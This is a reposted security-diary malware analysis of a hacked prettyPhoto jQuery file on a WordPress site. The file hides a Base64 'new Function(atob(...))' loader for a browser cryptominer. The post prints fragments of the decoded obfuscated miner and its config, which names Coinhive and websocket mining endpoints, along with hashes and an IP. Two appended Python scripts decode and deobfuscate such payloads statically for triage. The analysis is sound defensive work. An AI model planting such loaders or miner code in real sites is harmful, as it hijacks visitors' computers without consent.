steven36 Posted July 13, 2018

By Xavier Mertens

Yesterday I found an interesting compromised JavaScript file that contains extra code to perform crypto mining activities. It started with a customer's IDS alerts on the following URL:

    hxxp://safeyourhealth[.]ru/wp-content/themes/wp-trustme/js/jquery.prettyphoto.js

This website is not referenced as malicious and the domain looks clean. When you point your browser to the site, it loads the JavaScript file. So, I performed some investigations on this URL. jquery.prettyphoto.js is a file from the package prettyPhoto[1] but the one hosted on safeyourhealth[.]ru was modified. The original one starts like this:

    (function($) {
      $.prettyPhoto = {version: '3.1.4'};
      $.fn.prettyPhoto = function(pp_settings) {
        pp_settings = jQuery.extend({
        ...

The malicious one started like this:

    new Function(atob("dmFyIF8weDQ5ZTY9WydjYW5jZWxlZ...Y5ZignMHgyNycpXSgpOw=="))()
    (function($){$.prettyPhoto={version:'3.1.4'};$.fn.prettyPhoto=function(pp_settings){pp_settings=jQuery.extend({hook:'rel',animation_speed:'fast',ajaxcallback:function() ...

The file was submitted to VT and received a score of 1/59[2]. atob() is the JavaScript function used to decode Base64.
Let's extract the payload and decode it:

    $ curl --socks5 ten:9050 hxxp://safeyourhealth[.]ru/wp-content/themes/wp-trustme/js/jquery.prettyphoto.js | \
      grep atob | \
      awk -F '"' '{ print $2 }' | \
      base64 -d >jquery.prettyphoto.js.decoded
    $ cat jquery.prettyphoto.js.decoded
    var _0x49e6=['canceled','error','opt_in_canceled','_connect','lastPingReceived','getItem','parse','ident','_updateTabs','waitReconnect','dontKillTabUpdate','setItem','stringify','stats','_hashString','charCodeAt','WEBSOCKET_SHARDS','_onMessage','onerror','_onError','onclose','onopen','_onOpen','anonymous','user','toString','type','token','goal','ref','opt_in','_send','_onClose','code','job','enabled','_adjustThreads','hash_accepted','hashes','accepted','authed','Bee\x20Error:','invalid_site_key','invalid_opt_in','reset','banned','_onTargetMet','job_id','submit','nonce','result','_onVerified','send','some_code','ifExclusiveTab','FORCE_EXCLUSIVE_TAB','forceExclusiveTab','forceMultiTab','User','Anonymous','Res','URL','webkitURL','mozURL','createObjectURL','worker','onReady','currentJob','verifyJob','verifyCallback','_isReady','lastMessageTimestamp','ready','Expecting\x20first\x20message\x20to\x20be\x20\x22ready\x22,\x20got\x ...

The script is obfuscated with a very big array (_0x49e6) which contains pieces of strings and code. You can easily spot the behaviour of the script with the following snippet of code:

    var _0x348ae9 = navigator['hardwareConcurrency'] || 4;

The navigator.hardwareConcurrency is a read-only property which returns the number of logical processors available to run threads on the computer. Always interesting for a cryptominer to know how many threads can be started. If the code was obfuscated, strings were not.
More interesting strings are easy to find:

    self[_0x169f('0x98')][_0x169f('0x4b')] = {
      'LIB_URL': _0x169f('0xb2'),
      'ASMJS_NAME': _0x169f('0xb3'),
      'REQUIRES_AUTH': ![],
      'WEBSOCKET_SHARDS': [['wss://wss.rand.com.ru:8843/']],
      'CAPTCHA_URL': 'https://coinhive.com/captcha/',
      'MINER_URL': _0x169f('0xb4'),
      'AUTH_URL': 'https://authedmine.com/authenticate.html'
    };

I wrote a VTI hunting rule to search for scripts containing the string "navigator['hardwareConcurrency']" and I got some hits last night. All of them were submitted for the first time yesterday and got a score of 6/59:

    90201bc4af1721b02cf441a80cdd94183b9bbcb0f63ee0aa9843cb02f3ae6bdb
    58c2c761ca127e6392f72ac60b7f6cbf20fa52db7e7f94468e1640ee3a132c21
    56a2eebc67293799a01fa74a9d206ba336bc6df5c32ae68987d110e9bcd81cc2
    90201bc4af1721b02cf441a80cdd94183b9bbcb0f63ee0aa9843cb02f3ae6bdb
    7fa97e4b27e8542a0fc330bdd9cadccd1bafa166269a3bf846f7663b9f992be1
    835a19b59e1e2aeeb538509022581202756ee13e78b4d1c6592918ec854168bb
    ded2b6d76a00a67c60f0488b2d0507334363314552edc31a1fd29fdbebc493f6
    d920455b0d5f4783fb0fa3504ac14d540a3835774515cdc26284514ebad83f37
    ad453a6563ee5e1c522a4405c57e0740db343ba180981f4da65a19b9b8aaa883

All of them use the same IP address: 148.251.136.203. I also searched for similar compromised jquery.prettyphoto.js files. This code is used on many websites but I did not find other malicious occurrences. Please share if you find some.

[1] https://github.com/scaron/prettyphoto
[2] https://www.virustotal.com/#/file/977a811695dbbd370e162807e4c0fbc25c9fda8bba3417279c2f8ee1289a47e6/detection

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
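The diary's curl | grep | awk | base64 -d pipeline pulls the first atob() literal out of the file by hand. The following Python script is an added example (not part of the diary or the prettyPhoto project) that does the same extraction generically: it finds every atob("...") literal in a JavaScript file, tolerates wrapped literals and missing padding, decodes them without executing anything, and reports which of the tell-tale strings mentioned above (hardwareConcurrency, WEBSOCKET_SHARDS, the coinhive/authedmine hosts, wss:// endpoints) appear in the decoded payload. The sample file and payload embedded in it are constructed for the example; the real payload is far larger.

```python
import base64
import re
from pathlib import Path

# Constructed stand-in for the modified jquery.prettyphoto.js: a prepended
# new Function(atob("...")) wrapper followed by the legitimate plugin code.
# The payload text is made up for this example.
_PAYLOAD = (
    "var _0x49e6=['canceled','error','WEBSOCKET_SHARDS'];"
    "var _0x348ae9=navigator['hardwareConcurrency']||4;"
)
SAMPLE_JS = (
    'new Function(atob("' + base64.b64encode(_PAYLOAD.encode()).decode() + '"))()\n'
    "(function($){$.prettyPhoto={version:'3.1.4'};"
    "$.fn.prettyPhoto=function(pp_settings){};})(jQuery);\n"
)

# atob('...') or atob("..."): the literal may only contain base64 characters,
# padding and whitespace (minified files sometimes wrap long literals).
ATOB_RE = re.compile(r"""atob\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)""")

# Strings the diary points at as signs of a browser miner, checked in this order.
INDICATORS = ("hardwareConcurrency", "WEBSOCKET_SHARDS", "coinhive.com",
              "authedmine.com", "wss://")


def extract_atob_payloads(js: str) -> list[bytes]:
    """Decode every atob("...") literal in a JavaScript source text.

    Whitespace inside the literal is dropped and missing '=' padding is
    restored; a literal that still is not valid base64 is skipped rather
    than aborting the whole scan.
    """
    payloads = []
    for _quote, literal in ATOB_RE.findall(js):
        cleaned = re.sub(r"\s+", "", literal)
        cleaned += "=" * (-len(cleaned) % 4)
        try:
            payloads.append(base64.b64decode(cleaned, validate=True))
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
    return payloads


def miner_indicators(data: bytes) -> list[str]:
    """Return the INDICATORS present in a decoded payload, in table order."""
    return [s for s in INDICATORS if s.encode() in data]


def triage(js: str) -> dict:
    """Summarise a JS file: number of atob() payloads and the indicators found
    across them, so an IDS hit can be escalated without running the code."""
    payloads = extract_atob_payloads(js)
    found: list[str] = []
    for p in payloads:
        for s in miner_indicators(p):
            if s not in found:
                found.append(s)
    return {"payloads": len(payloads), "indicators": found}


def triage_file(path: str) -> dict:
    """Run triage() over a file fetched out of band (e.g. with curl as above)."""
    return triage(Path(path).read_text(encoding="utf-8", errors="replace"))


if __name__ == "__main__":
    print(triage(SAMPLE_JS))
```

The decoded payloads are never evaluated; they are only searched for strings, which is all the triage step needs. A file with zero atob() payloads and zero indicators is not cleared by this check, since the wrapper could use another decoder, so treat the result as a fast first pass on IDS hits, not as a verdict.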
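The decoded script hides its configuration behind the big _0x49e6 array and calls such as _0x169f('0xb2'). The following Python script is an added example (not the diary's or the project's code) of resolving that string-array obfuscation statically: it locates the array, finds the accessor function, and rewrites every accessor call into the literal it resolves to, which turns the config object above into readable LIB_URL/MINER_URL settings and exposes the wss:// shard endpoints. It assumes the accessor has the common shape "index minus a constant offset, then array lookup" (no array rotation); the sample array, offset, indices and example.invalid URLs are constructed for the example.

```python
import re

# Constructed excerpt in the shape of the decoded payload on the page: a string
# array, an accessor that indexes it with a hex string minus an offset, and a
# config object built from accessor calls. All values here are made up.
SAMPLE_ARRAY_JS = r"""
var _0x49e6=['canceled','error','WEBSOCKET_SHARDS','https://example.invalid/lib/worker.js','asmjs.min.js','https://example.invalid/miner.js','_config','CONFIG','Bee\x20Error:'];
var _0x169f=function(_0x1,_0x2){_0x1=_0x1-0x10;var _0x3=_0x49e6[_0x1];return _0x3;};
self[_0x169f('0x16')][_0x169f('0x17')]={'LIB_URL':_0x169f('0x13'),'ASMJS_NAME':_0x169f('0x14'),'REQUIRES_AUTH':![],'WEBSOCKET_SHARDS':[['wss://example.invalid:8843/']],'MINER_URL':_0x169f('0x15')};
var _0x348ae9=navigator['hardwareConcurrency']||0x4;
"""

JS_STR = r"'(?:\\.|[^'\\])*'"  # one single-quoted JS string literal
ARRAY_RE = re.compile(r"var\s+(_0x[0-9a-f]+)\s*=\s*\[\s*((?:%s\s*,?\s*)*)\]\s*;" % JS_STR)
STRING_RE = re.compile(r"'((?:\\.|[^'\\])*)'")
# Assumed accessor shape: var _0xACC=function(_0xA,_0xB){_0xA=_0xA-OFFSET; ...array[_0xA]... }
ACCESSOR_RE = re.compile(
    r"var\s+(_0x[0-9a-f]+)\s*=\s*function\s*\(\s*(_0x[0-9a-f]+)[^)]*\)\s*\{"
    r"\s*\2\s*=\s*\2\s*-\s*(0x[0-9a-fA-F]+|\d+)\s*;([^}]*)\}"
)


def js_int(s: str) -> int:
    """Parse a JS numeric literal as it appears in the obfuscated source ('0x13' or '19')."""
    return int(s, 16) if s.lower().startswith("0x") else int(s)


def js_unescape(s: str) -> str:
    """Turn \\xNN escapes back into characters (e.g. 'Bee\\x20Error:')."""
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)


def parse_string_array(js: str) -> tuple[str, list[str]]:
    """Return (array name, decoded items) for the first 'var _0x...=[...]' array."""
    m = ARRAY_RE.search(js)
    if not m:
        raise ValueError("no string array found")
    return m.group(1), [js_unescape(s) for s in STRING_RE.findall(m.group(2))]


def resolve_strings(js: str) -> str:
    """Replace every accessor('0xNN') call with the string it resolves to."""
    arr_name, items = parse_string_array(js)
    acc = ACCESSOR_RE.search(js)
    if not acc or arr_name not in acc.group(4):
        raise ValueError("no accessor function indexes " + arr_name)
    acc_name, offset = acc.group(1), js_int(acc.group(3))
    call_re = re.compile(re.escape(acc_name) + r"\(\s*'(0x[0-9a-fA-F]+|\d+)'\s*\)")

    def replace(m: re.Match) -> str:
        idx = js_int(m.group(1)) - offset
        if not 0 <= idx < len(items):
            return m.group(0)  # out of range: leave the call untouched
        lit = items[idx].replace("\\", "\\\\").replace("'", "\\'")
        return "'" + lit + "'"

    return call_re.sub(replace, js)


def miner_config(resolved: str) -> dict:
    """Collect 'KEY':'value' pairs (the LIB_URL/MINER_URL style settings)."""
    return dict(re.findall(r"'([A-Z_]+)'\s*:\s*'([^']*)'", resolved))


def websocket_shards(resolved: str) -> list[str]:
    """List wss:// endpoints, the mining proxies worth blocking and alerting on."""
    return re.findall(r"wss://[^'\"\s\]]+", resolved)


if __name__ == "__main__":
    out = resolve_strings(SAMPLE_ARRAY_JS)
    print(out)
    print(miner_config(out), websocket_shards(out))
```

Everything is done with regular expressions on the source text, so no part of the sample runs. When the accessor does something other than the assumed offset lookup (some obfuscators rotate the array first), resolve_strings() raises instead of silently producing wrong strings, and the array itself is still available from parse_string_array() for manual inspection.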